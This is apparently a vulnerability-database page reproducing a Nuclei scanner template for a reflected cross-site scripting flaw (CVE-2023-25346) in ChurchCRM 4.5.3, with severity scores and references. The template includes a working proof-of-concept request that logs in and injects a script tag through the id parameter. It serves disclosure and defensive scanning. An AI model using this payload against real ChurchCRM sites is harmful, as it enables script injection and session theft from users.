Lucene search

ProjectDiscoveryNUCLEI:CVE-2023-25346

HistoryJun 24, 2023 - 7:14 p.m.

ChurchCRM 4.5.3 - Cross-Site Scripting

2023-06-2419:14:38

ProjectDiscovery

github.com

cve2023

churchcrm

cross-site scripting

injection

data theft

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.002 Low

EPSS

Percentile

55.4%

JSON

A reflected cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter of /churchcrm/v2/family/not-found.

id: CVE-2023-25346

info:
  name: ChurchCRM 4.5.3 - Cross-Site Scripting
  author: Harsh
  severity: medium
  description: |
    A reflected cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter of /churchcrm/v2/family/not-found.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
  remediation: |
    Upgrade to a patched version of ChurchCRM or apply the necessary security patches to mitigate the XSS vulnerability.
  reference:
    - https://github.com/10splayaSec/CVE-Disclosures/tree/main/ChurchCRM/CVE-2023-25346
    - https://nvd.nist.gov/vuln/detail/CVE-2023-25346
    - https://github.com/ChurchCRM/CRM
    - https://github.com/10splayaSec/CVE-Disclosures
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-25346
    cwe-id: CWE-79
    epss-score: 0.00165
    epss-percentile: 0.5311
    cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: churchcrm
    product: churchcrm
  tags: cve2023,cve,churchcrm,xss,authenticated

http:
  - raw:
      - |
        POST /session/begin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        User={{username}}&Password={{password}}
      - |
        GET /v2/person/not-found?id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "<script>alert(document.domain)</script>")'
          - 'contains(body_2, "ChurchCRM")'
        condition: and
# digest: 4a0a004730450220266625a03a385660482d100a25922e690653fdba45bf1e1a41a827fd8af8caa6022100ca808f4d98cd7c2a45723e7770bcb998dbaf4affca5206da3a7bd75d4ff13283:922c64590222798bb761d5b6d8e72950

References

github.com/10splayaSec/CVE-Disclosures

github.com/10splayaSec/CVE-Disclosures/tree/main/ChurchCRM/CVE-2023-25346

github.com/ARPSyndicate/cvemon

github.com/ChurchCRM/CRM

nvd.nist.gov/vuln/detail/CVE-2023-25346

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.002 Low

EPSS

Percentile

55.4%

JSON

Related for NUCLEI:CVE-2023-25346